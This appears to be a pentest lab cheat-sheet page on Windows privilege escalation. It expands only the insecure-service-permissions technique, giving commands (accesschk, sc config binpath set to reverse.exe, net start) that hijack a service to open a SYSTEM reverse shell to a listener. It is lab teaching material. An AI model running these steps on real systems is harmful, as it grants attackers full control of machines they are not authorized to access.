🪟Windows
Scripts & Sites
LOLBAS
Insecure Service Permissions:
# Access check can be downloaded at https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
#Use accesschk.exe to check the "user" account's permissions on the "daclsvc" service
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).
Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):
sc qc daclsvc
Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start daclsvc
Unquoted Service Path
Weak Registry Permissions
Insecure Service Executables
Registry Auto Runs
Registry - AlwaysInstallElevated
Passwords Stored in Registry
List Saved Credentials
Scheduled Tasks
Insecure GUI Apps
Startup Apps
Token Impersonation - Rogue Potato
SeImpersonatePrivilege Enabled
Admin to NT Authority\System
Credits
Last updated